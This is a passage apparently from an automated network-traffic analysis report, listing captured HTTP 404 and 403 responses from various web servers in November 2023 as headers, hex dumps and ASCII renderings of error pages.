63 ca 89 f1 ea 93 b3 81 e7 5d 18 df e5 29 91 c6 af 9c 46 42 a6 a0 2e 9d aa f3 a8 41 fe 58 0a 5f 68 75 bc a1 7e 9c 92 5b 8b a6 24 06 2b 93 50 ac 36 65 44 c6 70 6c 38 d8 b8 e5 4b 98 06 c9 89 46 c6 85 94 18 c8 32 46 03 a2 a9 e0 8e 54 ea 2f b7 29 c3 54 31 70 66 ee 11 31 5e 49 f2 47 2e 2e 8c 6f 00 c2 fd 8d 59 51 9b af 4b ed 40 a4 4e 84 65 8e f9 31 08 fc fc fa b5 11 82 c1 84 42 01 52 dc 9f 48 2a d4 13 28 e1 ff 45 b9 6a 72 53 81 a4 99 be 3a 5a 52 1e 8a a5 3d 5f 66 90 8a 37 f4 35 68 4d 79 ac 8c 99 71 67 fa 44 c1 af 92 99 d3 1a fc da b9 76 94 bd 2c 4e 7c ed 94 b2 ab 6b 04 97 70 ed 94 cd d7 8e 37 b2 5d db bd 76 4e 07 b7 a7 83 6b c7 ec 9b 70 ab b1 df ce 78 8c 1f 6a 11 bf 1f 1e 36 96 68 f8 fb 75 05 88 af e2 5b e4 32 00 73 7a 67 a2 25 50 ce b2 ad c6 2f e1 0f d5 b8 76 96 99 45 79 c0 f2 b0 18 f7 46 95 81 b2 d1 c2 5b 01 ee 6c a7 94 db 6f d4 e7 0b 90 b3 89 3d b2 3d f3 fe fe e2 c8 f9 ec a5 f1 4b 42 95 11 51 06 06 fe 92 5c 0b 2b 06 0e 12 07 87 c6 67 ce d1 cb 28 e7 41 71 d3 13 da e7 bd bb 05 9e 51 f4 55 1f 2e d6 71 23 38 81 de 9d 96 ab 32 a7 67 77 2a cf 32 21 f5 2f a0 b4 9a 42 5f 53 64 a9 49 9a 4d 4f 38 2c 8d af 10 b8 67 2f 08 cb e1 c7 e8 a4 77 7f a1 40 29 84 79 ad 85 44 b5 6c 05 fa 5b dc f9 44 f4 ff db eb 1f 7f b0 95 96 78 3b 1a ad 4e 74 af 77 8f 72 04 49 31 ee fe 7e 33 3e 3b c1 19 05 35 b0 03 5c 55 fe 0c 81 3e 71 fb 6e 1f bf 09 5f 10 bc 06 0d 75 b2 fd 4c 80 c6 89 ee 61 00 b7 66 bf e0 35 4f 34 96 bb bd 8b 6a 81 82 e5 af 94 eb e1 e0 0b 29 c9 ea 04 ec 18 39 15 a7 44 ee e4 29 d0 76 88 85 bd be 9c 9d 7c 00 27 5e 72 ea 3f 17 9b de 85 04 9d 4b 6e 68 1b d0 04 ab 93 cd 5d 51 be de 5d 9d 84 d9 6c 26 7f d3 bf df f7 b6 02 e7 6b 81 d5 92 16 f2 63 75 80 8e 32 23 46 62 73 5a 37 16 30 e6 75 1e 9e 0d 03 fc 1b 45 c3 eb 3c 02 37 ba ce 07 ae 1b e2 df 09 39 ad 22 66 67 99 bf 53 d6 fb fc a5 37 7d b9 0b 1b 46 a4 f1 1e 9a fb a9 0a a4 51 d0 7b f5 ea e5 3e b3 11 fe f5 47 2e fe 0d 26 a7 8d f7
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lumaruniformes.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 13939Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 b2 db 76 e3 c6 96 25 fa 9c fa 0a 24 7c 9c 12 bd 89 1b 6f 92 28 51 1e de be d4 71 1f df da 69 d7 ae 3e 96 07 47 00 58 00 22 15 88 80 23 02 a4 98 da fa 97 d3 8f f5 d0 0f 3d ea 0f da 3f 76 16 2e 24 41 12 90 94 99 ca 5d bb 7c 11 03 eb 32 d7 5c 73 cd cb 97 a1 08 f4 2a 03 23 d1 29 bb 3a ba 2c 7e 0c 46 78 3c 33 41 59 df ff 9b 59 c4 80 84 57 47 2f 2e 53 d0 c4 08 12 22 15 e8 99 f9 eb 2f df 58 67 e6 26 ce 49 0a 33 73 41 61 99 09 a9 4d 23 10 5c 03 c7 ba 25 0d 75 32 0b 61 41 03 b0 ca 8f be 41 39 d5 94 30 4b 05 84 c1 cc 2b 51 18 e5 37 86 04 36 33 33 29 22 ca c0 34 12 09 d1 cc 4c b4 ce d4 d4 71 e2 34 8b 6d 21 63 e7 36 e2 8e 57 35 69 aa 19 5c fd 20 0c 05 06 f0 62 a6 fc f3 3f 90 bf 91 fd f9 3f 63 ca 89 f1 ea 93 b3 81 e7 5d 18 df e5 29 91 c6 af 9c 46 42 a6 a0 2e 9d aa f3 a8 41 fe 58 0a 5f 68 75 bc a1 7e 9c 92 5b 8b a6 24 06 2b 93 50 ac 36 65 44 c6 70 6c 38 d8 b8 e5 4b 98 06 c9 89 46 c6 85 94 18 c8 32 46 03 a2 a9 e0 8e 54 ea 2f b7 29 c3 54 31 70 66 ee 11 31 5e 49 f2 47 2e 2e 8c 6f 00 c2 fd 8d 59 51 9b af 4b ed 40 a4 4e 84 65 8e f9 31 08 fc fc fa b5 11 82 c1 84 42 01 52 dc 9f 48 2a d4 13 28 e1 ff 45 b9 6a 72 53 81 a4 99 be 3a 5a 52 1e 8a a5 3d 5f 66 90 8a 37 f4 35 68 4d 79 ac 8c 99 71 67 fa 44 c1 af 92 99 d3 1a fc da b9 76 94 bd 2c 4e 7c ed 94 b2 ab 6b 04 97 70 ed 94 cd d7 8e 37 b2 5d db bd 76 4e 07 b7 a7 83 6b c7 ec 9b 70 ab b1 df ce 78 8c 1f 6a 11 bf 1f 1e 36 96 68 f8 fb 75 05 88 af e2 5b e4 32 00 73 7a 67 a2 25 50 ce b2 ad c6 2f e1 0f d5 b8 76 96 99 45 79 c0 f2 b0 18 f7 46 95 81 b2 d1 c2 5b 01 ee 6c a7 94 db 6f d4 e7 0b 90 b3 89 3d b2 3d f3 fe fe e2 c8 f9 ec a5 f1 4b 42 95 11 51 06 06 fe 92 5c 0b 2b 06 0e 12 07 87 c6 67 ce d1 cb 28 e7 41 71 d3 13 da e7 bd bb 05 9e 51 f4 55 1f 2e d6 71 23 38 81 de 9d 96 ab 32 a7 67 77 2a cf 32 21 f5 2f a0 b4 9a 42 5f 53 64 a9 49 9a 4d 4f 38 2c 8d af 10 b8 67 2f 08 cb e1 c7 e8 a4 77 7f a1 40 29 84 79 ad 85 44 b5 6c 05 fa 5b dc f9 44 f4 ff db eb 1f 7f b0 95 96 78 3b 1a ad 4e 74 af 77 8f 72 04 49 31 ee fe 7e 33 3e 3b c1 19 05 35 b0 03 5c 55 fe 0c 81 3e 71 fb 6e 1f bf 09 5f 10 bc 06 0d 75 b2 fd 4c 80 c6 89 ee 61 00 b7 66 bf e0 35 4f 34 96 bb bd 8b 6a 81 82 e5 af 94 eb e1 e0 0b 29 c9 ea 04 ec 18 39 15 a7 44 ee e4 29 d0 76 88 85 bd be 9c 9d 7c 00 27 5e 72 ea 3f 17 9b de 85 04 9d 4b 6e 68 1b d0 04 ab 93 cd 5d 51 be de 5d 9d 84 d9 6c 26 7f d3 bf df f7 b6 02 e7 6b 81 d5 92 16 f2 63 75 80 8e 32 23 46 62 73 5a 37 16 30 e6 75 1e 9e 0d 03 fc 1b 45 c3 eb 3c 02 37 ba ce 07 ae 1b e2 df 09 39 ad 22 66 67 99 bf 53 d6 fb fc a5 37 7d b9 0b 1b 46 a4 f1 1e 9a fb a9 0a a4 51 d0 7b f5 ea e5 3e b3 11 fe f5 47 2e fe 0d 26 a7 8d f7
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: 4cdb76f0-ac0c-447e-ab02-c7fd8c561499Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 62 76 68 72 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at bvhrs.com Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 522906a5-3a0f-413b-8b91-6520c6622fe0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 7a17c252-4384-4a5c-92aa-b9c4d35f513bData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-215.ec2.internalX-Request-Id: d93bdd24-2e62-4221-ba7e-7b1503931066Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveKeep-Alive: timeout=20Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:11 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 34 8c 4d 07 f9 88 24 88 c4 94 c1 11 d3 9a 92 40 8b b4 68 fc f7 52 58 1c ef bb e7 9d 5c ba 4b af 09 bf d7 19 9c f9 a5 84 ba 39 95 45 02 c1 1e b1 c8 78 8e 98 f2 74 6b 8e 61 84 98 55 01 23 54 b9 a1 67 54 c9 56 2c c1 75 ae 97 2c 8e 62 a8 8c 83 dc cc 5a 50 dc 8e 84 e2 0a d1 87 11 5f ff 77 60 7f cc 92 08 1d 19 57 12 26 f9 9a a5 75 52 40 73 2b 01 5b 31 74 1a e1 d3 5a d0 0b ff f4 3c 18 0d 4e 75 16 ac 9c de 72 0a 29 8e de bf 9a 17 97 5f 44 7e e1 f7 2d aa cc 00 00 00 Data Ascii: M=0E'<4M$@hRX\K9ExtkaU#TgTV,u,bZP_w`W&uR@s+[1tZ<Nur)_D~-
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-17.ec2.internalX-Request-Id: 4fbb1219-31f6-4a77-adf9-ae1a3c8142a1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 